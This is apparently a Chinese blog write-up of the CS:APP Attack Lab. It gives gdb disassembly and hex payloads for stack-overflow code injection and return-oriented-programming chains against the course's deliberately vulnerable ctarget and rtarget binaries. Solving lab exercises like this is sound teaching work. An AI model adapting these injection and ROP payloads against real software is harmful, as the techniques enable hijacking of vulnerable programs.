Attacklab markup
作者:互联网
有点东西
PartI Level1
基础练习,注意使用hex2raw工具生成攻击串。
Dump of assembler code for function getbuf:
0x00000000004017a8 <+0>: sub $0x28,%rsp
0x00000000004017ac <+4>: mov %rsp,%rdi
0x00000000004017af <+7>: callq 0x401a40 <Gets>
0x00000000004017b4 <+12>: mov $0x1,%eax
0x00000000004017b9 <+17>: add $0x28,%rsp
0x00000000004017bd <+21>: retq
在<+12>位置找到%rsp的值,为0x5561dc78
(gdb) p/x *(0x5561dc78+40)
$4 = 0x401976
(gdb) disass test
Dump of assembler code for function test:
0x0000000000401968 <+0>: sub $0x8,%rsp
0x000000000040196c <+4>: mov $0x0,%eax
0x0000000000401971 <+9>: callq 0x4017a8 <getbuf>
0x0000000000401976 <+14>: mov %eax,%edx
0x0000000000401978 <+16>: mov $0x403188,%esi
0x000000000040197d <+21>: mov $0x1,%edi
0x0000000000401982 <+26>: mov $0x0,%eax
0x0000000000401987 <+31>: callq 0x400df0 <__printf_chk@plt>
0x000000000040198c <+36>: add $0x8,%rsp
0x0000000000401990 <+40>: retq
Dump of assembler code for function touch1:
0x00000000004017c0 <+0>: sub $0x8,%rsp
0x00000000004017c4 <+4>: movl $0x1,0x202d0e(%rip) # 0x6044dc <vlevel>
0x00000000004017ce <+14>: mov $0x4030c5,%edi
0x00000000004017d3 <+19>: callq 0x400cc0 <puts@plt>
0x00000000004017d8 <+24>: mov $0x1,%edi
0x00000000004017dd <+29>: callq 0x401c8d <validate>
0x00000000004017e2 <+34>: mov $0x0,%edi
0x00000000004017e7 <+39>: callq 0x400e40 <exit@plt>
只要把0x5561dc78+40修改成touch1的开始位置0x00000000004017c0
即可
转二进制是00000000 01000000 00010111 11000000
。在小端序机器上最后一位正好是0,所以不用管'\0'
的问题。
input hex:30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 c0 17 40
命令:echo 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 c0 17 40 | ./hex2raw | ./ctarget -q
PartI Level2
代码没有加栈随机,找到在<+12>位置%rsp的值为0x5561dc78,我们在此插入代码设置rdi并call touch2即可
由于各种攻击跳转必须用ret执行,插入的汇编代码如下:
p1l2.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 fa 97 b9 59 mov $0x59b997fa,%rdi
7: 48 c7 04 24 ec 17 40 movq $0x4017ec,(%rsp)
e: 00
f: c3 retq
input hex:
48 c7 c7 fa 97 b9 59
68 ec 17 40 00
c3
30 30 30 30 30
30 30 30 30 30
30 30 30 30 30
30 30 30 30 30
30 30 30 30 30
30 30
78 dc 61 55
首先通过缓冲区溢出让代码执行到mov指令,然后再次修改让代码进入touch2即可
PartI Level3
和Level2差不多,只是变成要传一个字符串了。我们把串放在缓冲区就行。
p1l3.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 97 dc 61 55 mov $0x5561dc97,%rdi
7: 48 81 ec 00 01 00 00 sub $0x100,%rsp
e: 68 fa 18 40 00 pushq $0x4018fa
13: c3 retq
sub %rsp命令不加的话插入的字符串会不知道为什么被改掉,所以加了一点空隙。
input hex:
48 c7 c7 97 dc 61 55
48 81 ec 00 01 00 00
68 fa 18 40 00
c3
30 30 30 30 30
30 30 30 30 30
30
35 39 62 39 39 37 66 61 00
78 dc 61 55
PartII Level1
这个part是让我们利用代码的片段进行result攻击。dump结果如下:
0000000000401994 <start_farm>:
401994: b8 01 00 00 00 mov $0x1,%eax
401999: c3 retq
000000000040199a <getval_142>:
40199a: b8 fb 78 90 90 mov $0x909078fb,%eax
40199f: c3 retq
00000000004019a0 <addval_273>:
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 retq
00000000004019a7 <addval_219>:
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 retq
00000000004019ae <setval_237>:
4019ae: c7 07 48 89 c7 c7 movl $0xc7c78948,(%rdi)
4019b4: c3 retq
00000000004019b5 <setval_424>:
4019b5: c7 07 54 c2 58 92 movl $0x9258c254,(%rdi)
4019bb: c3 retq
00000000004019bc <setval_470>:
4019bc: c7 07 63 48 8d c7 movl $0xc78d4863,(%rdi)
4019c2: c3 retq
00000000004019c3 <setval_426>:
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 retq
00000000004019ca <getval_280>:
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 retq
setval_426
有一个48 89 c7 90 c3,那么4019c5
位置可以执行mov %rax, %rdi; nop; retq
,非常有用。getval_280
有一个58 90 c3,4019cc
可以执行popq %rax; nop; retq
。
结合以上两条命令就可以直接开写了。
input hex:
30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
cc 19 40 00 00 00 00 00 /* popq %rax; nop; retq */
fa 97 b9 59 00 00 00 00 /* 被popq拿到,赋给%rax */
c5 19 40 00 00 00 00 00 /* mov %rax, %rdi; nop; retq */
ec 17 40 00 00 00 00 00 /* touch2 */
PartII Level2
分析一下,上面的两个命令很强大,而level2开放了add两数的命令,如果能拿到放string开头的地址就很好做了。
addval_190 401a06: mov %rsp, %rax
getval_481 4019dd: mov %eax, %edx
getval_311 401a69: mov %edx, %ecx
addval_436 401a13: mov %ecx, %esi
以上可以让我们对%esi
赋值,通过rsp和add_xy
算出相对位置就行了。
input hex:
30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
cc 19 40 00 00 00 00 00 /* popq %eax */
28 00 00 00 00 00 00 00 /* 用于pop, 40 */
dd 19 40 00 00 00 00 00 /* movl %eax, %edx */
69 1a 40 00 00 00 00 00 /* movl %edx, %ecx */
13 1a 40 00 00 00 00 00 /* movl %ecx, %esi, 此时%esi = 40 */
06 1a 40 00 00 00 00 00 /* movq %rsp, %rax */
c5 19 40 00 00 00 00 00 /* movq %rax, %rdi */
d6 19 40 00 00 00 00 00 /* add_xy, leaq (%rdi, %rsi, 1) %rax */
c5 19 40 00 00 00 00 00 /* movq %rax, %rdi */
fa 18 40 00 00 00 00 00
00 00 00 00 00 00 00 00
35 39 62 39 39 37 66 61 00
总结:没有bomblab折磨
标签:00,markup,30,mov,40,retq,Attacklab,c7 来源: https://www.cnblogs.com/xzz_233/p/attacklab_markup.html